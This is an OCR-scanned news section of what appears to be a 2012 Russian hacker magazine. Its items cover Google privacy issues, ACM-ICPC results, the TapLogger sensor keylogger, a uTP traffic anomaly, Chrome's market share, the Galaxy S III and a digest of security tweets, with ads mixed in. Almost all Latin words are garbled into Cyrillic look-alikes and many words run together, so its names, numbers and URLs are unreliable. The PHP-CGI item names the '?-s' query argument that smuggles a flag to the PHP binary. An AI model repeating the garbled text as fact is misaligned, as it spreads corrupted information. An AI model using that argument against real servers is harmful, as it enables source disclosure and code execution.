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ГЛОБАЛЬНЫЕ МАРИОНЕТКИ 



Говоря о приватности и анонимности, мы все больше теряем и ту, 
и другую. В социальных сетях можно найти информацию чуть л и 
не про любого человека. В боодіе Бігееі; Ѵіеѵѵя вижу свою машину. 
Браузер отправляет на сервер все поисковые запросы. Попу- 
лярные аддоны вообще отстукивают обо всех посещаемых II РІ. 
Трекинговые кукисы, установленные чуть ли не на каждом втором 
сайте, легко позволяютсоставлять граф перемещения пользова- 
теля. То, что сейчас воспринимается как обычный порядок вещей, 
ещеЗ-4года назад вызвало бы взрыв критики и недовольства. 
Сейчас мы вроде уже даже и не против отдавать информацию о 
нас. И даже зная, что некоторые программы раскрывают больше, 
чем мы того хотим, все равно продолжаем их использовать. А как 
уже отказаться? Еще более забавная ситуация с современными 
смартфонами, где речь идет уже не столько о потере приватности, 
сколько вообще о добровольном предоставлении удаленного 
контроля. Так, каждый смартфон на АпбгоісІ поддерживает связь 
со своего рода командным центром, что позволяет боодіе через 
механизм СТаІкБегѵісе уда лен но уста на вливать или удалять 
программы разом на всехустройствах. Аналогичнаятехнология 
Арріе РизЬ МоГГсаГоп Бегѵісе есть и для І05. И если отбросить 
параноидальные теории заговора, встает вопрос о банальной 
безопасности. Пускай разработчики и подошли к нему со всей 
тщательностью, мы все равно можем представить ситуацию, когда 
удаленную команду на уничтожение данных с модного іРЬопе'а мо- 
жет отправить не огорченный потерей девайса владелец, а вполне 
себе реальный злоумышленник. 

5«ер,гл.ред.][ 
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ВЕРОЯТНОСТЬНАЙТИМАЛВАРЬНАСАЙТАХ 
РЕЛИГИОЗНОЙ и идеологическойтематики 
в три раза выше, чем на порносайтах, сообщает 
Зутапіес. 
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РОССИЯНЕ ОДЕРЖАЛИ ОЧЕРЕДНУЮ ПОБЕДУ НА АСМ-ІСРС 

едавно в Варшаве состоялся финал ежегодного студенче- 
ского командного чемпионата мира по программированию 
2012 АСМ Іпіегпаііопаі СоІІедіаІе Ргодгаттіпд Сопіезі (АСМ- 
ІСРС). Мы неоднократно рассказывали обэтой олимпиаде, но всеже 
напомним, что чемпионат проводится при поддержке ІВМ, считается 
старейшим и одним из самых престижных соревнований в своей 
области. Команды российских вузов и вузов СНГ не только регулярно 
п ринимают участие в АСМ-ІСРС, ной обычно демонстрируют пре- 
красные результаты. Нынешний год не стал исключением: всего в со- 
ревнованиях участвовал о бол ее 8500 команд из 2219 университетов 
85 стран мира, в финал пробились л ишь 112 лучших, а победителями 
стали студенты Санкт-Петербургского национального исследова- 
тельского университета информационныхтехнологий, механики 
и оптики (СПбНИУ ИТМО). СПбНИУ ИТМОуже побеждал на чемпио- 
нате в 2004, 2008 и 2009 годах, так что теперь на счету университета 
рекордные четыре победы. Команда СПбНИУ ИТМО успешно решила 
девять из двенадцати задач за пять часов, продемонстрировав 
исключительный уровень профессиональных навыков и умение 
оперативно решать сложнейшие задачи. Чемпионы вернулись домой 
с призами и стипендиями от ІВМ, а также с гарантированным пред- 
ложениемтрудоустройства или стажировки в корпорации. Команды 
Варшавского университета. Московского физико-технического 
университета и Шанхайскогоуниверситета ЦзяоТун завоевали 
в АСМ-1СРС-2012золотые медали и заняли соответственно второе, 
третье и четвертое места. Поздравляем парней с победой! 





За последние десять 
леткомандыиз 
России выигрывали 
АСМ-ІСРСпятьраз 
изаработалисорок 
медалей. Кстати, 
следующий, 37-й 
финал чемпионата 
мирапопрограмми- 
рованиюпройдет 
в 2013 году в Санкт- 
Петербурге. 
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ОБВИНЕНИЯ В АДРЕС ^ЖОРПОРАЦИИ ДОБРА» 
ОКАЗАЛИСЬОБОСНОВАННЫМИ 




оодіе частенько обвиняют в том, что компания излишне при- 
стально наблюдаетза пользователями, и далеко не всегда 
имеется в виду новое драконовское соглашение о конфи- 
денциальности и вытекающие из него последствия. К примеру, не 
та к давно за океаном разразился скандал из-за того, что автомобили 
сервиса ЗігееіѴіеѵѵ заподозрил и в сборе приватной информации, 
передаваемой по открытым сетям ѴѴі-Рі (имена пользователей, фраг- 
менты электронныхписем и сообщений). Федеральная комиссия 
связи США провела расследование этого инцидента и опубликовала 
отчет. Увы, заключение комиссии связи оказалось неутешительным. 
Хотя руководство ІТ-гиганта и утверждало, что ему ничего не извест- 
но о сборе персональной информации, расследование подтвердило, 
чтообэтомзнали какминимумтри сотрудника компании, включая 
старшего менеджера. Теперь РСС обвиняет Соодіе в намеренном 
утаивании е-таіі одного из сотрудников, ответственного за раз- 
работку кода. В письме сотрудникобсуждал состаршим менеджером 
возможность сбора данных службой ЗігееіѴіеѵѵ. Известно, что этот 
программист также рассказал о возможном незаконном сборе при- 
ватных сведений в сетях ѴѴІ-РІ еще одному работнику компании. 
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ЮМАЯУОТАЗАПУСТИЛА 
в Москве сеть ІТЕ. Не отстает 
и<<Мегафон^>— имаяопера- 
тортакже начал оказывать 
услуги доступа в интернет 
потехнологииІТЕ. 




тм ГОТОВИТСЯ квыпу- 
СКУОСВІАСКВЕЯЯУЮ, 

созданной на базе ОМХ. 

Стало известно, что новая ОС 
будетнесовместимаспри- 
ложениями для предыдущих 
версий. 




ПЛОХИ ДЕЛАУ50МУ:компа- 
ния завершает с убытками 
уже четвертый финансовый 
год, но на этот раз они до- 
стигли рекордной отметки — 
5,7миллиарда долларов. 




^^ЛАБОРАТОРИЯ КАСПЕРСКО- 
ГО» ПОДСЧИТАЛА: находясь 
в интернете, пользователи 
в среднем подвергаются ата- 
кам 108 035 раз в час или 1800 
раз в минуту! 




Ѵ\(Е5ТЕЯН0І6ІТАІ пред- 
ставила на выставке БСБІ 
Тгабе Аззосіаііоп ТесИпоІоду 
ББО-накопитель с промыш- 
ленным интерфейсомБАБ, 
обеспечивающим скорость 
передачи данныхв 12 Гбит/с. 
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НЕ ЭКОНОМЬТЕ НА ПРИНТЕРЕ, ЭКОНОМЬТЕ 
НА РАСХОДНЫХ МАТЕРИАЛАХ. 

КѴОСЕРА. НАДЕЖНОСТЬ, КОТОРАЯ ОКУПАЕТСЯ. 




Как и все МФУ компании КУОСЕКА, модель Р5-1135МРР обладает не 
только исключительной надежностью, но и необычайно низкой 
общей стоимостью владения. Зачем экономить один раз, если можно 
экономить с каждой страницей? 

Экономьте с каждой распечатанной страницей: 

► Высокая скорость при низкой себестоимости печати - до 35 страниц формата А4 в минуту 

► Низкие затраты на тонер благодаря технологии ЕС05У5 

► Автоматический режим отключения, сокращающий энергопотребление 

КУОСЕКА. ВЫ МОЖЕТЕ НА НАС ПОЛОЖИТЬСЯ. 




КИОСЕРА Документ Солюшенз Рус - Телефон +7 (495) 741 00 04 - ѵѵѵѵѵѵ.куосегасІоситеп1:50Іи1:іоп5.ги 

Корпорация КУОСЕЯА Ооситепі 5оІи(іоп$ - шшш.куосегасІоситеп($оІи(іоп$.сот 



КУ псЕРа 

Ооситепі: 5оІи1;іоп5 



МЕ6АМЕѴѴ5 



В ПЕРВОМ КВАРТАЛЕ 2012 ГОДА Индия вышла на первое место в мире по распространению спама, сообщаетБорИоз. 



НЕОЖИДАННАЯ 

НОВИНКАОТІМТЕЕ 

ІМТЕІ ПРЕДСТАВИЛА БЮДЖЕТНЫЙ МИНИ-КОМПЬЮТЕР 



ТРОЯН РАСПОЗНАЕТ 

КОЛЕБАНИЯ 

СМАРТФОНА 




ока все производителижелеза былиувлечены штамповкой комплек- 
тующихдля сотен моделей планшетных ПКи смартфонов, компа- 
ния Іпіеі занималась разработкой не столь трендового, но не менее 
интересного решения. Изделие продемонстрировали в рамках РАХЕазІ, оно 
представляет собой мини-компьютер, получивший амбициозное название МУС 
(Мехі УпіІоІ'СопприІіпд), что можно перевести как «следующий вид компью- 
теров». Новинка выполнена на материнской плате размером всего 10x10 см! 
Плата хоть и больше платы VI А Рісо-ІТХ, размер которой составляет 1 0x7,2 см, 
но меньше платы ѴІАМапо-ІТХ(12х12см). Но МУС представляет интерес прежде 
всего тем, что в его основе л ежит производительный процессор Соге іЗ/іб на 
базе архитектуры ЗапсІуВгісІде с интегрированным графическим ядром Іпіеі НО 
3000 и двухканальная оперативная па мять типа ООРЗ (два гнезда для модулей 
50-0ІММ). Это обеспечивает МУС быстродействие, сравнимое со скоростью 
ноутбуков для массового потребителя. Охлаждение процессора — активное. 
Новинка оснащена интерфейсами ТЬипсІегЬоІС У 5В 3.0, 802.11 Ь/д/п и НОМ I. При 
этом цена МУС должна составить всего около 100 долларов. Появление девайса 
в продаже ожидается уже во втором полугодии. 




МІСР050РТУВЕРЯЕТ, ЧТО ЧЕРВЬСОМРІСКЕЯ ВСЕ ЕЩЕ ОПАСЕН 



СОГЛАСНО ОТЧЕТУ МІСК050РТ 
5ЕС0КІТѴ ІНТЕСЫСЕНСЕ 
КЕРОКТ, В ЧЕТВЕРТОМ 
КВАРТАЛЕ 2011 ГОДА 
СОНРІСКЕК БЫЛ ОБНАРУЖЕН 
НА 1,7 МИЛЛИОНА СИСТЕМ 



ПРЕДСТАВЛЕН РРООР-ОР-СОМСЕРТ 
ИНТЕРЕСНОЙ МАЛВАРИ 

онцептнеобычнойтроянской программы пред- 
ставила недавно группа американских исследо- 
вателей. Их троян Таріоддег, ориентированный 
наустройства на базе АпбгоісІ 05, — обычный кейлоггер, 
то есть перехватчик вводимых с экран ной клавиатуры 
символов. Однако сам перехват данных реализован 
оченьоригинально — для работы программе достаточно 
штатного доступа квстроенным сенсорамустройства 
(гироскопу, датчику ориентации и акселерометру). 

Малварь, по сути, маскируется под простенькую 
игру — пользователю предлагают найти среди разбро- 
санных по экрану пиктограмм одинаковые изображения 
и «закрыть» их прикосновением к экрану. Таким образом 
программа калибруется, собирая и запоминая стати- 
стику обо всех наклонах и колебаниях корпуса. После 
«игры» Таріоддег остается работать в фоновом режиме, 
продолжая собиратьданные. Через какое-то время при- 
ложение можете большой вероятностью определить, 
к какому месту экрана прикасается пользователь. Пока 
Таріоддег способен уверенно определять только ввод 
цифровой информации. Демонстрируя возможности 
кейлоггера, исследователи провели успешную атаку — 
подбор РІМ-кода. 

При наборе номера телефона или вводе РІМ-кода про- 
грамма ассоциирует рассчитанные вероятностным путем 
позиции экрана с областями формы набора номера или 
экранной клавиатуры, расположениеэлементов которых 
изначально известно. Полученные данные отправляются 
для обработки на внешний сервер, гдеанализируется 
статистика и восстанавливается последовательность 
введенных да иных. Повернемся к примеру с подбором 
РІМ-кода. Исследователи приводятвесьма интересные 
цифры: если для перебора использовать обычные методы, 
то для подбора четырехзначного РІМ-кода придется 
перебрать около 10 000 вариантов. Если же использовать 
Таріоддег, количество попытоксократится до81 и можно 
будет достигнуть стопроцентного шанса науспех! Для 
шестизначных РІМ-кодов, которыеужетребуютперебора 
миллиона комби наций, Таріоддег позволяет сократить 
количество комбинаций до 729, а вероятность успешного 
взлома оценивается в 80%. 

Ну и самое неприятное — хотя прототип кейлоггера 
ориентирован на платформуАпбгоісІ, аналогичную мал- 
варь будет нетрудно реализоватьи для других мобиль- 
ных платформ. Создатели Таріоддег подчеркивают, что 
возможность неограниченного доступа установленных 
приложений к сенсорам движения, без предварительного 
подтвержденияэтихполномочий юзером, является не- 
доработкой безопасности также в ѴѴіпсІоѵѵз 8 и ВІаскВеггу 
05. Перед подобной атакой неустояти джейлбрейкнутые 
І05-устройства. Исследователи зловеще прогнозиру- 
ют: учитывая полную незащищенностьАпсІгоісІ и других 
платформ перед такими атаками, в ближайшем будущем 
можноожидатьпоявления нетолько исследовательских 
прототипов, но и настоящего вредоносного ПО, манипу- 
лирующего информацией от сенсоров. С полным отчетом 
можно ознакомиться здесь: с5е.р5ц.ес1и/~52Ьи/рарег5/ 
ІарІоддег.рсІІ 
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Сгапи 1:0 ВІ8І:іР'' 

с 1608 г. 



визнміііз 



Масіе іп ВизЬтіІЬ ѵі11а§е, Со. Апі:гіт. Сгапі: 1:о ВІ8І:і1 1608"'"' 



ЗтСЕ ѴѴАУ ВАСК 

в первую очередь эти парни — верные друзья. 

И только во вторую очередь — известная российская группа 11та2гтаН. 









МЕ6АМЕѴѴ5 



МІСК050РТ ВЫПУСТИЛА НОВУЮ ВЕРСИЮ своего бесплатного антивирусного пакета — ЗесигіІуЕззепІіаІз 4.0. 



АНОМАЛИИ В рТОРРЕМТ 



СПЕЦИАЛИСТЫ НАБЛЮДАЮТ СТРАННЫЕ ИЗМЕНЕНИЯ ТРАФИКА 




льский центр СЕРТ бьеттревогу — в сети рТоггепІ 
(протокол иТР)творится что-то неладное. Не 
та к давно был о зафиксировано значительное 
увеличениетрафика, которое продолжается посейдень. 
Специалисты центра утверждают, чтовсеэто можетсвиде- 
тельствовать о появлении инфицированных узлов и потока 
пакетовсподдельными ІР-адресами. Ненормальный рост 
и изменениеструктурытрафика по иТР наблюдается уже 
в течение нескольких месяцев. Доля иТР и связанных с ним 
пакетов значительно возросла, а весь объем трафика 
увеличился в 23 раза! Анализ ІР-адресов пока не дает 
никаких результатов, наблюдается вполне равномерное 
распределение по разным странам, в том числе России, 
Украине, Китаю, Канаде, США. О причинаханомалии пока 
остается л ишь гадать. Основные четыре версии: сбор 
информации илизамусориваниесети представителями 
правообладателей; чей-то неудачный экспериментили 
ошибка в программном обеспечении; операция помаски- 
ровкесетевойактивности путем генерации мусорного 
трафика; эхо от атаки на другие сети. Вероятно даже, что 
так проявляется активность компании Рігаіе Рау. Данный 
российский стартап финансируется МісгозоЙ, и его цель — 
«отравление»торрент-трафика, дабы помешать работе 
торрент-клиентов. 




Аномальный 
рости изменение 
структуры трафика 
по иТР продолжа- 
ется уже несколько 
месяцев. Например, 
вот статистика от 
польского центра 
безопасности СЕРТ. 

Апрель2011: 

183 

пакета ІІОР 
(~0,2%трафика) 

Апрель2012: 

957047 

пакетов ІІОР 
(~45%трафика) 



СНРОМЕСТАЛ 
БРАУЗЕРОМ №1 



СНЯОМЕ ОБОШЕЛ КОНКУРЕНТОВ. ЦИФРЫ И ФАКТЫ 

□ ОЛЯ рынка, принадлежащая браузеру боодіе 
СИ готе, неуклонно растет. Для боодіе 20 мая 
2012 года, похоже, станет исторической датой — 
именно в этот день СИ готе вырвался в лидеры, наконец 
обогнав своих конкурентов. 

По статистике ЗіаШоипІег, боодіе СЬготе еще пол года 
назадзанимал вобщемтопебраузеровтретьеместо, но 
вскоре ему уда л ось обогнать Рігеі'ох и стать вторым. Впро- 
чем, львиная доля мирового рынка все равно оставалась 
за неизменным «ослом» от МісгозоЙ — Іпіегпеі Ехріогег. 
Господство ІЕ на рынке вообще продолжается уже много 
лет, и «побороть» его никому не уда вал ось. Но СИ готе 
сделал то, чего не смогли другие, — 20 мая браузер от 
боодіе обогнал по популярности ІЕ, с учетом всех его вер- 
сий, вместе взятых! Ксчастью, доля ІЕна рынкевообще 
планомерно снижается. С мая 2011 года онаупала с43,9% 
до31,4%, втовремя какдоля СЬготеза этотже период, 
напротив, выросла с 20% до 32%. 

Разумеется, СЬготе пока превалируетне везде, 
браузер по-прежнемууступаетконкурентам на некото- 
рых ключевых рынках. К примеру, в СШАІпІегпеІ Ехріогег 
выигрывает у СИ готе с перевесом 30,9% против 27,1%. А в 
Китае у браузера от М іеговой и вовсе астрономические 
72,3% (хотя год назад было 86,9%, что опять же указывает 
на снижение популярности). 

У нас«Хром»тоже показывает отличные результаты: 
в России боодіе СИ готе вышел на первое место среди 
десктопныхбраузеров, оставив позади прежнего лидера 
рынка — брега. 





^<ВКОНТАКТЕ>^подвел 
итоги конкурса на разработку 
лучшего мессенджера для 
іРИопе. В состязании приняли 
участие более 200 разра- 
ботчиков и команд. Первое 
местозаняло приложение ѴК 
Меззадез («Сообщения ѴК») 
21-летнегопетербуржца Пе- 
тра Яковлева. Специально для 
конкурса он освоил ОЬ)есІіѵе 
С! В награду петербуржец 
получил 2,5 миллиона рублей. 
ѴКужезапустил аналогичный 
конкурсдляАпбгоісІ. 




«РУССКИЕ»ХАКЕРЫ зарабо- 
тали В2011 году 4, 5 миллиарда 
долларов, тогда какоборот 
рынка киберпреступности 
за тотже период составил 
12,5 миллиарда, сообщает 
6гоир-1В. 




КРУПНЕЙШИЕ ПРОВАЙДЕРЫ 

Великобританиизакрыли 
доступ кторрент-трекеру ТИе 
Рігаіе Вау, сдержав обещание, 
данное в февралезвукозапи- 
сывающим компаниям. 
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Иіизнь Алексея Немова - это 
жизнь вопреки. Вопреки диагнозам 
врачей, Алексей стал олимпийским 
чемпионом. Вопреки поражению 
в Афинах, он стал триумфатором 
в глазах людей. Преодоление 
у Немова в крови. Он ставит цель, 
достигает ее и идет дальше. 
КЕЕРтШІИО 



}ОНККІЕ ѴѴаекек. а V 
Узнайте его иеторию:ІоШіешаІкег.сот/шаІЫ{ІідШ8 











МЕ6АМЕѴѴ5 



13 МАЯ ИСПОЛНИЛОСЬ РОВНО ДЕСЯТЬ ЛЕТ С момента релизаеМиІе — клиента дляфайлообменной сети е0опкеу2000. 



ЗАМЗиМб 6А1АХУ 3 III ПРЕДСТАВЛЕН ОФИЦИАЛЬНО 

ВЫШЕЛ НОВЫЙ ФЛАГМАН ОТЗАМЗОНС 



а мероприятии Заппзипд МоЬіІе ІІпраскесІ 2012, 
прошедшем в Лондоне, представлен долго- 
жданный для многих флагман третьего поко- 
ления смартфонов линейки 6А1АХУ5. Аппарат оснащен 
экраном ЗирегАМОІЕО размером 4,8 дюйма с разрешением 
1280x720 пикселей. В распоряжении пользователя име- 
ются две камеры: тыловая 8-мегапиксельная (сенсор В5І) 
савтофокусом, нулевой задержкой срабатываниязатвора 
и вспышкой и лицевая 1,9-мегапиксельная камера, способ- 
ная записывать НО-видео с частотой 30 кадров в секунду. 
Работает устройство под управлением 0САпсІгоісІ4.0 (Ісе 
СгеатЗапсІѵѵісЫ. Железо «под капотом» новинки будет 
различным для разных стран. Оказалось, что в японской 
версии Заппвипд ОаІахуЗ III 5С-06О установлен двухъядер- 
ный процессорЗпарсІгадоп 54(американцытожедолжны 
получитьаппараты стаким процессором) и 2 Гб РАМ, вто 
время каквевропейской версии используется процессор 
Ехупозсчетырьмяядрами и 1 Гб РАМ. По каким причинам 
Заппзипд пошел на такой шаг — неизвестно. Зато известно, 
что изначально на рынок выйдут варианты с 16 или 32 Гб 
встроенной памяти, а затем появится модель и с 64 Гб. Так- 
же осталась возможность расширения объема памяти при 
помощи ппісгоЗО (до 64 Гб). Смартфон поддерживает работу 
в сетях 2,50 (05М/0РР5/ЕО0Е) 850/900/1800/1900 МГц, 30 
(Н5РА+21 Мбит/с) 850/900/1900/2100 МГци на некоторых 
международныхрынках — 40 ІТЕ. Среди прочихсредств 
подключения можноупомянутьѴѴі-Рі 802.11 а/Ь/д/п, 0Р5/ 
01ОМА55, МЕС и ВІиеІооФ4.0 (1Е).5апп5ипд СаІахуБІІІ 
оснащентехнологией ѴѴі-Рі СЬаппеІ Вопбіпд, удваивающей 
пропускную способность сети ѴѴі-Рі. Автономная работа 
обеспечивается батареей 2100 мАч. Размеры устройства 
136,6x70,6x8,6 мм, масса — 133 г. На момент старта продаж 
аппарат будет доступен в двух цветовых исполнениях: 
синем и белом. Вообще, корпусустройства выполнен 
вхорошознакомом всем нам глянцевом (азначит — мар- 
ком) пластмассовом форм-факторе. Такжебытуетмнение, 
чтодизайн флагмана вообщебыл придуман юристами, 
а не конструкторами Заппзипд. Якобы скругленныеуглы 
и корпуснечерногоцвета сделаны намеренно, чтобы 
компания Арріе не подала очередной иск. 0А1АХУ5 III ис- 
пользует возможности АпбгоісІ 4.0 на полную катушку, но, 
кроме этого, содержит множество уникальных технологий. 





Перечислим некоторые особенности: девайс умеет 
распознаватьлица, голоса ижесты иучитыватьпо- 
лучаемуюинформациювработе. Голосовой интерфейсЗ 
Ѵоісе обеспечивает нетолько базовое взаимодействие 
с устройством, НОИ отправку сообщений, работу с плани- 
ровщиком, фотосъемку итакдалее. Поскольку новинка 
учитываетдвижения, возможна, например, итакая 
ситуация: ты пишешь кому-то текстовое сообщение, 
но потом решаешь вместо этого позвонить адресату — 
для вызова будет достаточно поднести смартфон куху. 
Благодаря функции Зтагізіаусмартфон даже способен 
спомощьюфронтальной камеры фиксировать движе- 
ния глаз владельца и определять, смотритли человек 
на экран! Также аппарат получил улучшенную версию 
технологии АпбгоісІ Веат — 5 Веат, которая позволя- 
етпередаватьразличныефайлы, просто коснувшись 
своим смартфоном другого Заппзипд 0а1аху5 ІІІ.Файл 
объемом 1 Гбможетбытьпереданзатриминуты,араз- 
мером 10 Мб — за две секунды. Замечу, что это далеко 
невсефишкиустройства,такчто, пожалуй, нестоит 
удивляться его цене. :) 



На российском рынке смартфон появится 5 июня. 
Рекомендуемая розничная стоимость 6А1АХУ 5 III с 16 Гб 
встроенной памяти составит29 990 рублей. Несмотря 
натакой ценник, число предварительныхзаказов 
на новинкууже превысило девятьмиллионов. 



НОВЫЙ РЕКОРД НА КІСК5ТАРТЕР— ЧАСЫ РЕВВІЕЕ-РАРЕР 



ЧАСЫ ДЛЯ СМАРТФОНОВ 
С ДИСПЛЕЕМ НА 
БАЗЕ ЭЛЕКТРОННОЙ 
БУМАГИ СОБРАЛИ 
БОЛЕЕ 10 МИЛЛИОНОВ 
ДОЛЛАРОВ ЗАКАЗОВ 
И ПОЖЕРТВОВАНИЙ! 
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гаітшЬіх: 

Не удаляйте виртуальные маши- 
ны, пока полностью не уверены, 
что все из них вытащили. #пло- 



хои_день 



Н Комментарий: 

Нажать кнопку «Удалить» 
в ѴігШаІВох'е психологически куда проще, 
чем отформатировать реальный жесткий 
диск. Иногда это приводит к фейлам. :( 




Га](1иск1337: 

боодіе написали в блог офиген- 
ную заметку об их инициативе 
по фаззингу с помощью класте- 
ра — СЬготіит ВІод: Риггіпд Ьг Зесигііу 
Ьир:/Л.со/ппАХЗТТ1п . 

Н Комментарий: 

Ну а кто еще может использовать 
сотни машин для поиска уязвимостей, если 
не боодіе? Молодцы ребята. 



(атзітопі: 

У нас есть сотрудник, фамилия 
которого МиІІ. Он убил наше 
корпоративное приложение по 
поиску сотрудников... ЬирУЛ.со/пиРсЕНК 

Н Комментарий: 

Иногда человек может поломать софт 
одной своей фамилией. :) 



Н ГЭтѵѵІгаскег: 

СѴЕ-201 1-061 1:РІа5ЬвРОР 
продолжает быть в топе целе- 
вых эксплойтов РОР неделю за 
неделей, год спустя после выхода патча. 

Н Комментарий: 

Патчи выходят, а толку? Проверь 
безопасность своих компонентов за две 
секунды на ѵѵѵѵѵѵ.бигі'раігоі.ги . 




(ВсВекгаг: 

V Хорошие новости, АсІоЬе отсту- 
пили, теперь будут патчить уяз- 
вимости в РЬоІозЬор, ІІІизІгаІог 
и РІазЬ Рго бесплатно. Ьир://Ыиу/37УУг5Ц 

Н Комментарий: 

Поначалу АбоЬе предложили выпу- 
скать патчи безопасности за ДЕНЬГИ. Это 
вызвало такую волну... гнева, что товарищи 
одумались и вернулись к классической 
схеме бесплатных обновлений, исправляю- 
щих уязвимости. 



ГаіОпІс: 

«Дайте мне ваш Арріе Ю + 
пароль, тогда я смогу загрузить 
джейлбрейк прямо на ваш 




іСІоисІ» 



(ВаіКЫѵу: 

ЙіОпІс аіііЫѵѵЙдтаіІ.сопп Разз - 

Н Комментарий: 

Это победа :) 



-А]ІП2345 




гаіОпІс: 

Мне кажется, что столько моих 
фолловеров возмущены моими 
твитами, потому что они не 
знают, как меня разфолловить. 

□ Комментарий: 

В твиттерах свой Дом-2. Например, 
Стеффен Эссер против разработчиков РНР 
(по поводу истории с багом .рЬр?-з). Или 
Баттхерд отбивается от фанатов Арріе, кото- 
рые недовольны деятельностью Эссера по 
теме джейлбрейка іРабЗ. 




(агис1(1у_ги: 

Забавный факт: вы не можете 
твитнуть свой пароль от твит- 
тера. 



Га]о5Исогтап: 

«ПенТесты должны симулиро- 
вать атакующих, но часто симу- 
лируют других пентестеров» 
гаЬагооптеег на #ІТѴѴеЬ5ес 



(Всіаѵіепиіетоозе: 

Грустное. Он только что сказал 
«СЕН» и потерял уважение всех 
пен-тестеров в зале :(. Серьезно, 
был слышен стон! #ВзісІезСЫсадо 

Н Комментарий: 

СЕН — сертифицированный этичный 
хакер. Кстати, этот самый сертификат ты 
теперь можешь получить и в Москве! 




Га^оІ1п^аТѵѵС: 

Ты понимаешь, что ты хакер, 
если каждый раз инструктиру- 
ешь ѴѴогсІ о том, что 5ЕН — это 
не опечатка для 5НЕ. 

□ Комментарий: 

Структурная обработка исключе- 
ний (англ. 5ЕН — бІгисШгесІ Ехсерііоп 
НапсІІіпд) — механизм обработки программ- 
ных и аппаратных исключений в ОС Місгозоі'і 
ѴѴіпбоѵѵз, позволяющий программистам кон- 
тролировать обработку исключений, а также 
являющийся отладочным средством. 



ГаМагк№егд1ег: 

Каждый день — это 2 его бау. 
Где-то кто-то ломает, исследу- 
ет, расширяет, модифицирует, 
взламывает, обходит и улучшает что-то. 
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МЕСАМ ЕѴѴЗ РАЗМЕРАУДИТОРИИРАСЕВООК ПРИБЛИЖАЕТСЯ КМИЛЛИАРДУ. в марте 2012-го социальная сеть насчитывала 901 миллион человек. 



ДОМАШНИЙЗО-ПРИНТЕР 

ПЕЧАТЬФИЗИЧЕСКИХОБЪЕКТОВСТАНОВИТСЯ ДОСТУПНЕЕ 



КРИТИЧЕСКАЯ 
УЯЗВИМОСТЬ В РНР 




Междупрочим, 
СиЬе— несамыйдо- 
ступныйЗО-принтер 
на рынке. Некоторое 
время назад 
начался прием пред- 
варительныхза- 
казовнаЗО-принтер 
ЗоІісІоосІІе, цена 
которого составляет 
всего 499 долларов. 



□ последнее время мы частенько упоминаем на страницах журнала 

30-принтеры. К примеру, недавно мы рассказывали о том, что на ТЬе 
Рігаіе Вау заработал раздел, откуда можно скачать цифровые модели 
физических объектов. Скачать и распечатать :). Однако многие до сих пор по- 
лагают, что 30-принтер непременно должен выглядеть как огромный станок, 
который слишкомтяжел и великдля обычной квартиры, а собратьтакого 
монстра — жуткодорого. Еще недавноэти утверждения были правдой, но 
в последние годы на рынке начали появляться компактные и весьма бюджет- 
ные 30-принтеры «для дома». Один из таких девайсов — 30-принтер СиЬе 
был представлензимой на выставке СЕ5 2012 компанией СиЫІ^у. Устройство 
позволяетсоздаватьобъекты из пластика методом струйной печати (Ріазііс 
Зеі Ргіпііпд, РЗР). Максимальный размер объекта равен 14х14х14см, толщина 
каждого слоя, формируемого печатающей головкой с одним соплом, равна 250 
м км. Сам принтер тоже небольшой (26x26x34 см) и весит 4,3 кг (без картриджа 
с расходным материалом). К компьютеру СиЬе подключается по беспроводной 
сети ѴѴі-Рі 802.11 Ь/д. Устройство уже можно заказать за 1299 долларов. Один 
картридж стоит 50 долларов, а при покупке нескольких картриджей предо- 
ставляется скидка (всего в наличии десять цветов). По оценке производителя, 
одного картриджа хватит для печати «13-14 объектов среднего размера». 



ИНФОРМАЦИЯ О НЕИЗВЕСТНОМ РАНЕЕ БАГЕ 
СЛУЧАЙНО ПОПАЛА В СЕТЬ 

о какой-тодосадной случайности закрытое 
обсуждение критическойуязвимости СѴЕ-2012- 
1823 в конфигурациях РНР-ССІ, патч для которой 
еще не готов, было опубликовано в открытом доступе 
и практически моментально попало на РебсІіС Дыркуеще 
вянваретекущего года обнаружили специалисты ком- 
пании ЕіпсІЬагеп. Оказывается, в 2004 году разработчики 
РНРзачем-тоубрали из кода проверкуназнак«=» встроке 
запроса. Согласно СОІ РРС, в случае отсутствия знака «=» 
в строке запроса сервер обязан воспринимать эту строку 
какнаборсимволов, а не как команду. Но в том же 2004 году 
в РНРотменилиэту проверку, та к что теперь в некоторых 
конфигурациях сервера и обработчика запросов аргумент 
вроде ?-5 в II РІ любого РНР-документа воспринимается 
как прямая команда -5 к бинарникуРНР-ССІ. Таким спосо- 
бом можно направить к РНР любое количество параметров, 
приводящих к показу исходников скриптов, исполнению 
произвольного кода и другим неприятным вещам. Оттакой 
атаки не спасают ни за1'е_ппосІе, ни аІІоѵѵ_игІ_іпсІисІе, ни 
какие-либо другие защитные опции іпі. РНР Сгоир выпу- 
стила обновленные версии РНР 5.3.1 2 и РНР 5.4.2, но дырка 
закрыта наскоро. Нормальный патч должен появиться 
в ближайшем будущем. Подробности ты найдешь в статье 
«РНР: старая песня о главном». 
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В 2013 ГОДУ ФИНСКАЯ КОМ- 
ПАНИЯ АЫзІгот выпустит 
линейку обоев ЕазуЫ^е, 
которые фильтруютэлек- 
тромагнитное излучение. 
Соседи несмогутворовать 
ѴѴІ-РІ!:) 



МОЛОДЫЕ ЕВРОПЕЙЦЫ 
В ВОЗРАСТЕ 15-25 ЛЕТ все 
чаще покупаютѴРМ-сервисы, 
показало исследование 
группы СуЬегпогтз. Рынок 
платныхѴРМ за два с полови- 
ной года вырос на 40%. 



КОМПАНИЯ 60061Е объяви- 
ла о повышении оплаты за 
найденные в своих продук- 
тах баги— максимальная 
награда выросла с краси- 
вого числа 31 33,7 до 20 000 
долларов. 



ПРОСМОТРОѴОСПОМОЩЬЮ 
ШТАТНЫХ СРЕДСТВ ѴѴіпбоѵѵз 
8 станет невозможен — 
поддержку ОѴО в Месііа 
РІауегрешили отключить. 
ѴІС и Месііа РІауегСІаззіс 
в массы! 



В КАТАЛОГЕ АРРІЕІТиНЕЗ 
ПОЯВИЛОСЬНОВОЕ 
НЕПЕЧАТНОЕСЛОВО — 

«джейлбрейк» ()аіІЬгеак). 
Слово фильтруется и во всех 
разделах выглядиттак: 
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по ДАННЫМ 50РН05, каждый пятый Мае является носителем ѴѴіпсІоѵѵз- 
вирусов, а каждый тридцать шестой заражен вирусами под Мае 05Х. 



МІСР050РТМЕНЯЕТ5КУРЕ 

ПЕРТУРБАЦИИ И ПРОБЛЕМЫ ѴОІР-СЕРВИСА 

□ мае прошлого года корпорация МісгозоЙприобрелаѴоІР- 

сервиеЗкуреза кругленькую сумму в 8,5 миллиарда долларов. 
Как только информация о сделке была обнародована, многие 
